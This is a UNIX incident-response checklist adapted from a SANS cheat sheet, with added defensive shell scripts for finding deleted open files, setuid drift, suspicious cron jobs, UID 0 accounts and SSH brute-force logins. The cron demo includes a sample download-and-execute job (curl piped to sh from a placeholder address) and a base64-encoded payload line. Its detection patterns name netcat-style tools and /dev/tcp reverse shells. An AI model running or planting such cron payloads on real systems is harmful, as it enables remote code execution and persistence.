UNIX Incident Response

This template is based on a SANS Institute cheat sheet, much like the Windows one; however, it covers UNIX-based systems. Be aware that the power of UNIX systems lies in the command-line interface (the shell), so one must be proficient in it not only for troubleshooting but also for determining whether a system has been compromised. Note that some of these commands require root (or equivalent) privileges; I would personally recommend using sudo, where available, for the tasks that need root. Keep in mind as well that on a compromised host the tools themselves (ps, ls, netstat, lsof and so on) may have been replaced by a rootkit, so where possible run known-good copies from trusted, read-only media and treat the output of the installed binaries with suspicion.

a.     To look for unusual processes and services, use the following commands:

a.     ps aux – displays running processes along with their owning user, process ID (PID), start time and command line. Pay particular attention to processes owned by root (UID 0), because they run with full privileges; ps -eo user,uid,pid,ppid,cmd prints the numeric UID next to the name if the distinction matters.

b.     ps -ef – the System V form of the full process listing, including the parent PID (PPID) and full command line; useful for spotting processes with unexpected parents (a shell spawned by a web server, for example) or with names chosen to resemble system daemons.

c.     lsof -p PID – lists the files, sockets and ports held open by a specific process, which is the quickest way to examine a suspected Trojan, worm or other network-based malware on a UNIX system.

d.     lsof +L1 – lists open files with a link count below one, that is, files that have been unlinked (deleted) while a process still holds them open. This is how one finds an attacker hiding data or running a backdoor whose binary has already been deleted from disk.
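As an added example (this is not from the original page or the SANS checklist), the following script reproduces what lsof +L1 shows by reading the kernel's own records under /proc, which also sidesteps an lsof binary that a rootkit may have replaced. It assumes a Linux host with /proc mounted; the background process and scratch file it creates are a constructed demonstration, and the function names are mine.

```shell
#!/bin/sh
# Added example (not from the original page or the SANS checklist): find
# processes holding files that have been unlinked, which is what "lsof +L1"
# reports, by reading the kernel's own records under /proc. Useful when lsof
# is absent or its binary on a compromised host cannot be trusted.
# Assumes Linux with /proc mounted; run as root to see every process.

# Print one "PID<TAB>COMMAND<TAB>PATH" line per open descriptor whose target
# has been deleted. The kernel appends " (deleted)" to the symlink target;
# fileless payloads loaded via memfd_create() appear as "/memfd:<name> (deleted)".
find_deleted_open_files() {
    for fd in /proc/[0-9]*/fd/*; do
        target=$(readlink "$fd" 2>/dev/null) || continue
        case "$target" in
            *' (deleted)')
                pid=${fd#/proc/}; pid=${pid%%/*}
                comm=$(cat "/proc/$pid/comm" 2>/dev/null)
                printf '%s\t%s\t%s\n' "$pid" "$comm" "${target%' (deleted)'}"
                ;;
        esac
    done | sort -u
}

# Constructed demonstration: a background process opens a scratch file on
# fd 3, deletes it (as an attacker does to hide a dropped tool or a capture
# file), then keeps running. The scan still recovers the path. Returns that path.
demo_hidden_open_file() {
    scratch=$(mktemp /tmp/hidden.XXXXXX)
    ( exec 3<"$scratch"; rm -f "$scratch"; exec sleep 30 ) &
    holder=$!
    tries=0
    while [ -e "$scratch" ] && [ "$tries" -lt 100 ]; do   # wait until unlinked
        sleep 0.05; tries=$((tries + 1))
    done
    find_deleted_open_files | awk -F'\t' -v pid="$holder" '$1 == pid { print $3 }'
    kill "$holder" 2>/dev/null || true
}

if [ "${1:-}" = "--demo" ]; then
    demo_hidden_open_file
fi
```

Run it with --demo to see the deleted scratch path recovered; on a real host, call find_deleted_open_files as root and review every entry whose command or path you cannot account for.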

b.     To look for unusual files, the find command with its various flags lets one search the whole UNIX filesystem for malware. A few examples are listed below:

a.     find / -uid 0 -perm -4000 -print – lists setuid files owned by root, i.e. programs that run with root privileges no matter who executes them. An unexpected setuid binary, especially under /tmp, /var/tmp or a home directory, is a classic privilege-escalation backdoor; compare the list against a known-good baseline where one exists.

b.     find / -size +50000k -print – lists files larger than the given size (here 50,000 KiB, roughly 50 MB).

c.     This is particularly useful for finding files that do not belong on the system, such as movies, games or large archives of collected data.
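The script below is an added example, not part of the original page or the SANS checklist: it turns the one-off setuid search into a baseline comparison so that a newly dropped setuid binary stands out among the dozens of legitimate ones. It assumes GNU find (for -printf); the fake directory tree, file names and the "drift" it detects are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original page or the SANS checklist): list
# setuid files under a tree and diff the list against a saved baseline, so a
# setuid binary dropped by an attacker stands out. Uses GNU find's -printf.
# For a real host, run as root with "/" as the tree (and add -uid 0 to limit
# the output to root-owned files, as the page's one-off command does).

# Print "mode owner path" for every setuid regular file under $1, sorted
# bytewise so the output can be fed to comm(1).
list_setuid() {
    find "${1:-/}" -xdev -type f -perm -4000 -printf '%m %u %p\n' 2>/dev/null | LC_ALL=C sort
}

# Compare a fresh scan of tree $2 against baseline file $1. Prints "+ line"
# for setuid files that are new (or changed mode/owner) and "- line" for
# baseline entries that have disappeared or changed.
diff_setuid_baseline() {
    baseline=$1; tree=$2
    list_setuid "$tree" | LC_ALL=C comm -3 "$baseline" - |
        awk -F'\t' '$1 == "" { print "+ " $2; next } { print "- " $1 }'
}

# Constructed demonstration: a fake root with one legitimate setuid binary,
# a baseline taken from it, then a hidden setuid file appearing under /tmp
# (a typical privilege-escalation backdoor). Returns the diff lines.
demo_setuid_drift() {
    fake=$(mktemp -d)
    mkdir -p "$fake/usr/bin" "$fake/tmp"
    : > "$fake/usr/bin/passwd"; chmod 4755 "$fake/usr/bin/passwd"   # legitimate setuid
    : > "$fake/usr/bin/ls";     chmod 755  "$fake/usr/bin/ls"        # not setuid
    list_setuid "$fake" > "$fake/baseline.txt"
    : > "$fake/tmp/.x";         chmod 4755 "$fake/tmp/.x"            # dropped after baseline
    diff_setuid_baseline "$fake/baseline.txt" "$fake"
    rm -rf "$fake"
}

if [ "${1:-}" = "--demo" ]; then
    demo_setuid_drift
fi
```

In practice the baseline is taken from a freshly installed system or a known-good peer and stored off-host; the comparison then reports only what changed.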

c.     To look for unusual network usage on a system's network interfaces, type the following command:

a.     ip link | grep PROMISC – lists any network interface running in promiscuous mode, which can be a clear indication that an attacker is running a packet sniffer (ifconfig shows the same PROMISC flag on older systems).

b.     Other useful commands for observing unusual network behaviour are:

c.     netstat -nap – displays all sockets with numeric addresses and the owning PID and program name (-p shows other users' processes only when run as root); listening ports with no legitimate purpose are a common sign of a backdoor. On recent Linux systems netstat may not be installed; ss -nap gives the same view.

d.     arp -a – displays the system's IP-to-MAC address mappings and can be useful for finding hosts that are not supposed to be on the network (e.g. a rogue wireless access point that lets an outsider into the internal network). On recent Linux systems ip neigh shows the same table.

d.     To look for scheduled jobs (tasks) belonging to root or any other user, type the following command:

a.     crontab -u root -l – lists root's scheduled jobs (repeat with -u for every other account); useful for detecting logic bombs, scheduled connections to unknown hosts and other persistence mechanisms.

b.     Two additional places to check for system-wide cron jobs are:

c.     cat /etc/crontab – displays the jobs in the system crontab.

d.     ls /etc/cron.* – lists the files in the cron.d, cron.hourly, cron.daily, cron.weekly and cron.monthly directories. Per-user crontabs live under /var/spool/cron (or /var/spool/cron/crontabs on Debian-derived systems); also check /etc/anacrontab, pending at jobs (atq) and, on systemd hosts, systemctl list-timers.
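The sweep below is an added example, not part of the original page or the SANS checklist: it gathers live entries from whichever cron files it is given and flags the traits most often seen in cron-based persistence (download-and-execute pipelines, encoded payloads, netcat-style tools, reverse shells via /dev/tcp, and jobs running from world-writable or hidden paths). The pattern list is illustrative rather than complete, and the sample crontab and spool entries (including the 203.0.113.7 documentation address) are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original page or the SANS checklist): collect
# live cron entries from the given files and flag traits common to cron-based
# persistence and logic bombs. Patterns are illustrative, not exhaustive.

# Print every non-comment, non-blank line from each file, prefixed with the
# file name as given, so a hit can be traced back to its source.
collect_cron_entries() {
    for f in "$@"; do
        [ -f "$f" ] || continue
        awk -v f="$f" '!/^[[:space:]]*(#|$)/ { print f ": " $0 }' "$f"
    done
}

# Read collected entries on stdin; print "<reason><TAB><entry>" for each hit.
flag_suspicious_cron() {
    awk '
        function flag(reason) { print reason "\t" $0 }
        /(curl|wget)[^|]*\|[[:space:]]*(ba)?sh([[:space:]]|$)/  { flag("download-and-execute") }
        /base64[[:space:]]+(-d|--decode)/                        { flag("encoded-payload") }
        /(^|[^A-Za-z0-9_])(nc|ncat|socat)[[:space:]]/            { flag("network-tool") }
        /\/dev\/tcp\//                                            { flag("bash-reverse-shell") }
        /\/(tmp|var\/tmp|dev\/shm)\/|\/\.[A-Za-z0-9]/             { flag("suspicious-path") }
    '
}

# Constructed demonstration: a system crontab with three stock Debian lines
# plus one injected download-and-execute job, and a user spool file with a
# hidden binary under /dev/shm and a base64-encoded payload. Returns the hits.
demo_cron_sweep() {
    dir=$(mktemp -d)
    cat > "$dir/crontab" <<'EOF'
# /etc/crontab: system-wide crontab
SHELL=/bin/sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/5 *   * * *   root    curl -s http://203.0.113.7/u.sh | sh
EOF
    cat > "$dir/www-data" <<'EOF'
@reboot /dev/shm/.cache/upd
0 3 * * * echo 'ZWNobyBwd25lZA==' | base64 -d | sh
EOF
    ( cd "$dir" && collect_cron_entries crontab www-data ) | flag_suspicious_cron
    rm -rf "$dir"
}

if [ "${1:-}" = "--demo" ]; then
    demo_cron_sweep
fi
```

On a live host, feed collect_cron_entries the real files: /etc/crontab, /etc/cron.d/*, /etc/anacrontab and every file under the per-user spool directory. Anything flagged still needs a human to decide whether it is legitimate; the script only shortens the list.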

e.     To look for unusual accounts, use the following commands to check the account files:

a.     sort -nk3 -t: /etc/passwd | less – displays all accounts sorted numerically by UID (the third colon-separated field), which makes UID 0 accounts and accounts that do not belong on the system easy to spot.

b.     egrep ':0:' /etc/passwd – displays accounts with UID 0, i.e. root permissions. Note that the pattern also matches a GID of 0, so on some distributions it lists service accounts such as sync, shutdown and halt; awk -F: '$3 == 0' /etc/passwd matches the UID field alone.

c.     getent passwd | grep ':0:' – same as above, but also covers accounts supplied by other name services (LDAP, NIS, etc.) configured in /etc/nsswitch.conf.

d.     find / -nouser -print – searches the entire system for files whose owning UID has no entry in the password database, such as files left behind by a temporary account an attacker created and later deleted.
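As an added example (not from the original page or the SANS checklist), the script below audits passwd data by testing the UID field directly, reports UIDs shared by more than one account, and shows side by side how much the page's grep ':0:' over-reports. It reads passwd lines on stdin so it works on /etc/passwd or on getent passwd output; the sample passwd data, including the attacker-added "toor" and "dbadmin" accounts, is constructed.

```shell
#!/bin/sh
# Added example (not from the original page or the SANS checklist): audit
# passwd data for root-equivalent and duplicate UIDs by testing the UID
# field itself, and show why grep ':0:' over-reports. Reads passwd lines on
# stdin, so it works on /etc/passwd or on "getent passwd" output alike.

# Names of accounts whose UID (third colon-separated field) is exactly 0.
uid0_accounts() {
    awk -F: '$3 == 0 { print $1 }'
}

# UIDs shared by more than one account: prints "uid name1 name2 ...".
# A second UID 0 account is the classic backdoor; a duplicate of an ordinary
# user's UID lets an attacker read and write that user's files unnoticed.
duplicate_uids() {
    awk -F: '{ names[$3] = names[$3] " " $1; count[$3]++ }
             END { for (u in count) if (count[u] > 1) print u names[u] }' | sort -n
}

# The page's grep, for comparison: ":0:" also matches a GID of 0.
grep_colon0() {
    grep ':0:' | cut -d: -f1
}

# Constructed sample passwd data: Red Hat-style service accounts with GID 0,
# plus two accounts an attacker might add ("toor" with UID 0 and "dbadmin"
# reusing alice's UID).
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
operator:x:11:0:operator:/root:/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
dbadmin:x:1000:1000::/var/lib/db:/bin/bash
toor:x:0:0::/tmp/.t:/bin/bash'

demo_uid0_accounts()  { printf '%s\n' "$SAMPLE_PASSWD" | uid0_accounts | paste -sd ' ' -; }
demo_grep_colon0()    { printf '%s\n' "$SAMPLE_PASSWD" | grep_colon0   | paste -sd ' ' -; }
demo_duplicate_uids() { printf '%s\n' "$SAMPLE_PASSWD" | duplicate_uids; }

if [ "${1:-}" = "--demo" ]; then
    echo "UID 0 accounts:      $(demo_uid0_accounts)"
    echo "grep ':0:' reports:  $(demo_grep_colon0)"
    echo "duplicate UIDs:"; demo_duplicate_uids
fi
```

On the sample data the UID test returns only root and toor, while grep ':0:' also returns sync, shutdown, halt and operator, which merely have GID 0. On a real host, pipe getent passwd rather than cat /etc/passwd so directory-backed accounts are included.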

f.      The best place to check for unusual system activity is the log files, especially on UNIX. Most of them live in /var/log: /var/log/messages or /var/log/syslog for general system events and /var/log/secure or /var/log/auth.log for authentication, depending on the distribution. A good command for viewing log files is:

a.     more -f /var/log/messages – allows a page-by-page review of all logged events (less works equally well and can search). Pay attention to user logins and authentication failures, and to unusual patterns such as missing entries or gaps in time that may indicate an intruder is trying to hide his or her tracks. The login records reported by last, lastb and who, and journalctl on systemd hosts, should be checked too.
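Paging through a log finds the obvious; the script below is an added example (not from the original page or the SANS checklist) of the kind of quick triage that finds the rest in a syslog-format authentication log: failed sshd logins per source address, and any address whose failures were followed by an accepted login, i.e. a password-guessing run that worked. It reads log lines on stdin; the sample lines and their TEST-NET addresses are constructed.

```shell
#!/bin/sh
# Added example (not from the original page or the SANS checklist): triage
# sshd events in a syslog-format authentication log (/var/log/secure or
# /var/log/auth.log): failed logins per source address, and any address whose
# failures were followed by a success, i.e. a password-guessing run that worked.
# Reads log lines on stdin; the sample below is constructed (TEST-NET addresses).

# "count ip" for every source address with failed password attempts, most first.
failed_logins_by_ip() {
    awk '/sshd\[[0-9]+\]: Failed password for/ {
             for (i = 1; i <= NF; i++) if ($i == "from") { n[$(i+1)]++; break }
         }
         END { for (ip in n) print n[ip], ip }' | sort -rn
}

# "ip user" for each accepted login from an address that had already failed
# at least $1 times (default 3). Field 6 of a syslog line is the event verb.
brute_force_successes() {
    awk -v min="${1:-3}" '
        /sshd\[[0-9]+\]: (Failed|Accepted) (password|publickey) for/ {
            ip = ""; user = ""
            for (i = 1; i <= NF; i++) {
                if ($i == "for")  user = $(i+1)   # "invalid" on invalid-user lines
                if ($i == "from") ip   = $(i+1)
            }
            if ($6 == "Failed") fails[ip]++
            else if (fails[ip] >= min) print ip, user
        }'
}

# Constructed sample: one address guesses four times and then gets in as
# alice; another fails once and then logs in legitimately with a key.
SAMPLE_AUTH_LOG='Jan 14 03:12:01 web01 sshd[2211]: Failed password for invalid user admin from 198.51.100.23 port 50120 ssh2
Jan 14 03:12:04 web01 sshd[2211]: Failed password for invalid user admin from 198.51.100.23 port 50120 ssh2
Jan 14 03:12:09 web01 sshd[2214]: Failed password for root from 198.51.100.23 port 50131 ssh2
Jan 14 03:12:15 web01 sshd[2219]: Failed password for alice from 198.51.100.23 port 50140 ssh2
Jan 14 03:12:20 web01 sshd[2219]: Accepted password for alice from 198.51.100.23 port 50140 ssh2
Jan 14 03:40:11 web01 sshd[2301]: Failed password for bob from 192.0.2.10 port 41022 ssh2
Jan 14 03:41:02 web01 sshd[2305]: Accepted publickey for bob from 192.0.2.10 port 41030 ssh2
Jan 14 04:00:00 web01 CRON[2400]: pam_unix(cron:session): session opened for user root by (uid=0)'

demo_failed_by_ip() { printf '%s\n' "$SAMPLE_AUTH_LOG" | failed_logins_by_ip; }
demo_brute_force()  { printf '%s\n' "$SAMPLE_AUTH_LOG" | brute_force_successes 3; }

if [ "${1:-}" = "--demo" ]; then
    echo "failed logins by source:"; demo_failed_by_ip
    echo "successes after repeated failures:"; demo_brute_force
fi
```

Against the sample, 198.51.100.23 accounts for four failures and then an accepted login as alice, so that session is the one to pull apart first; bob's single typo followed by a key-based login from 192.0.2.10 is not reported. On a real host run the functions over the whole retained log, not just the current file, since an intruder's first attempts are often in a rotated copy.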

g.     Other commands to check for possible clues are:

a.     uptime – displays how long the system has been running. An unexpected reboot, or an uptime that does not match the system's maintenance history, is a clear indication that something has changed and may need further review.

b.     free – shows how much RAM is in use. Combined with top or ps, it helps identify processes consuming an unusual amount of memory (e.g. an attacker bulk-querying or modifying a database).

c.     df – shows available disk space. Sudden changes in free space can indicate that an attacker is staging tools or collected data on the system, or removing files (including logs) from it.

http://www.sans.org/score/checklists/ID_Linux.pdf

 
